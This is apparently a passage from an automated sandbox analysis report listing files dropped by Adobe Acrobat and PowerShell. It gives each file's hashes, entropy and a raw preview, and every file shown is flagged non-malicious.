                                                                      Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1727703676000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d550de899f04b5f1cb01c3a7438d5d96","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696428962000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"cfa45c7829b86b94abc8cd788add6752","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696428962000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"2dd86d6e5f99203c47dd099f6b5e82b8","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696428955000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"3ef850c86adcfefa30feaf6c5c1404b1","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1696426848000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"955b63af1bb125ce44faeb9a35adb91d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696426848000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg"
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                      Category:dropped
                                                                      Size (bytes):12288
                                                                      Entropy (8bit):0.993947822605474
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLKufx/XYKQvGJF7ursB1RZKHs/DVf4OpUfuVJLueveuOKOF:TGufl2GL7msvgOVf4cUfuzLuSrOKW
                                                                      MD5:5C9DB498269693EB82B446AA88967336
                                                                      SHA1:6FD378383CAAE18F7089C4420CBBB0670F2A1D5A
                                                                      SHA-256:06D261ADF676B6606050651A2390FCC0657E0FE942BEF9D9E599E60CE6BF4FFE
                                                                      SHA-512:2CF42452E921557D9D010EE9938497BD68066E98C7F4107C6FBE907B31CD99B29B6E2A34A85F2606921047306997AB451E2EF61C0D35DB9C501E70B61CA27DD5
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):1.3542545377908821
                                                                      Encrypted:false
                                                                      SSDEEP:24:7+tJ61RZKHs/Ds/SpsOpUfuVJLueveuOKOqqLhx/XYKQvGJF7ursh:7MUgOVpscUfuzLuSrOKfqFl2GL7msh
                                                                      MD5:A90EF5C9045D83E1829343557FA55A44
                                                                      SHA1:A1F4B82B9594B5D3F4234F71040D8BDBE1FE64C9
                                                                      SHA-256:8D3FE153DD3936EF9E4320E7777D2C2E0976BB171B6A6C448351C8E9C4D165E7
                                                                      SHA-512:CE08C5C7D66D9E19385632549AA9DF9F5DC6ADFBA97943E0FB2A159D2DA2B3C9F094AC5A88BFDF0235E5934920FFA4E140E2428C14005203C99B8B2C57423699
                                                                      Malicious:false
                                                                      Preview:.... .c......\./......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#...z.>.....}.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):9434
                                                                      Entropy (8bit):4.928515784730612
                                                                      Encrypted:false
                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):246
                                                                      Entropy (8bit):3.5177502348333967
                                                                      Encrypted:false
                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87eTlH:Qw946cPbiOxDlbYnuRKIg9
                                                                      MD5:DE8A7A65D6943CD1E3804D47B7DCABAC
                                                                      SHA1:A7AD9CF42504F5126E523C8205AB6CD4E12604F7
                                                                      SHA-256:96C0A18492CAF5283D11456E03321F54192FBC27418422C0EA4EEB434C11C120
                                                                      SHA-512:1C1F03A73BA1C6234DF4CB96FC912C1BCCAA73DEAF5B58950D5D07030D51F632ADCB9012CB5D934810DF1A2D952D45EC0C1445504441F154B307CDA7053E1AD6
                                                                      Malicious:false
                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .3.0./.0.9./.2.0.2.4. . .0.9.:.4.1.:.2.1. .=.=.=.....
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                      Category:dropped
                                                                      Size (bytes):144514
                                                                      Entropy (8bit):7.992637131260696
                                                                      Encrypted:true
                                                                      SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                      MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                      SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                      SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                      SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                      Malicious:false
                                                                      Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393)
                                                                      Category:dropped
                                                                      Size (bytes):16525
                                                                      Entropy (8bit):5.376360055978702
                                                                      Encrypted:false
                                                                      SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                      MD5:1336667A75083BF81E2632FABAA88B67
                                                                      SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                      SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                      SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                      Malicious:false
                                                                      Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15114
                                                                      Entropy (8bit):5.362832819196059
                                                                      Encrypted:false
                                                                      SSDEEP:384:fTHWvrqyitMCTykqboldv1SMk/ICQcopoTjkaGkVuYgtjITacFAicRclwF7tCZBA:MRO
                                                                      MD5:B49F37DC58215199E0F52BD867E32E58
                                                                      SHA1:546FB58C685730D4B2D91A6842A4D96CF1716771
                                                                      SHA-256:E14B6DF2B8D784EE9D534FA2AB62A2B0C524A3D47A3C829AD21B153376F70C81
                                                                      SHA-512:AF765358E5FC755C3B361556A6A9A15DD39C3A6B48C3646F1BB13B661F0742133EB14D629B2F83D74B97A23C841F8A34827A7D8CC2E6F7A6B05F202D389A7853
                                                                      Malicious:false
                                                                      Preview:SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:693-0400 ThreadID=7488 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:697-0400 ThreadID=7488 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:697-0400 ThreadID=7488 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:697-0400 ThreadID=7488 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c578da12-005e-4b08-b51a-05aa84f8cd7f.1727703675693 Timestamp=2024-09-30T09:41:15:697-0400 ThreadID=7488 Component=ngl-lib_NglAppLib Description="SetConf
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):29752
                                                                      Entropy (8bit):5.402029690120667
                                                                      Encrypted:false
                                                                      SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb1:5
                                                                      MD5:C39D1EC004F7D30D7C76A5ECFC7B57BB
                                                                      SHA1:A069B5DC2893D8F401F50B72173DA07603CA9C15
                                                                      SHA-256:2A8B4772DD0AD8CD50C524681E97A1F75A058BCE66E561C7217A397C0D95D9E4
                                                                      SHA-512:6A7E673B8E29B6B5EF75582DC7DF45B4998DD3A2B21716F8A345C3F8713E0440468E10F47BBBCE9C56720B91D6539D6DBDAABE97CDD63C6D03EF275541EAE662
                                                                      Malicious:false
                                                                      Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                      Category:dropped
                                                                      Size (bytes):1419751
                                                                      Entropy (8bit):7.976496077007677
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                      MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                      SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                      SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                      SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                      Category:dropped
                                                                      Size (bytes):758601
                                                                      Entropy (8bit):7.98639316555857
                                                                      Encrypted:false
                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                      MD5:3A49135134665364308390AC398006F1
                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                      Malicious:false
                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                      Category:dropped
                                                                      Size (bytes):1407294
                                                                      Entropy (8bit):7.97605879016224
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                      Category:dropped
                                                                      Size (bytes):386528
                                                                      Entropy (8bit):7.9736851559892425
                                                                      Encrypted:false
                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                      Malicious:false
                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PDF document, version 1.4, 1 pages
